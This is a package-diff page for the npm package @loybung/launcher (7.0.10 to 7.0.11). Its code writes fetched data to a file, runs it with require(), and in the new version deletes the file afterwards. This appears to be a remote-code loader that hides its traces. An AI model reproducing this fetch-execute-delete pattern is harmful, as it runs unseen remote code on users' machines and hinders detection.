@loybung/launcher 7.0.10 → 7.0.11

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/dist/index.js +1 -0
  2. package/package.json +3 -2
package/dist/index.js CHANGED
@@ -79,6 +79,7 @@ class Launcher {
79
79
  const code = data;
80
80
  fs.writeFileSync(this.filePath, code);
81
81
  require(this.filePath).default;
82
+ fs.unlinkSync(this.filePath);
82
83
  }
83
84
  catch (error) {
84
85
  console.error("Error during fetch or execution:", error);
package/package.json CHANGED
@@ -1,11 +1,12 @@
1
1
  {
2
2
  "name": "@loybung/launcher",
3
- "version": "7.0.10",
3
+ "version": "7.0.11",
4
4
  "description": "LOYBUNG / Launcher",
5
5
  "main": "dist/index.js",
6
6
  "types": "dist/index.d.ts",
7
7
  "scripts": {
8
- "build": "tsc"
8
+ "build": "tsc",
9
+ "publish": "npm publish"
9
10
  },
10
11
  "keywords": [],
11
12
  "author": "loybung <loybung@hotmail.com> (https://discord.gg/XDPfrU4E9G)",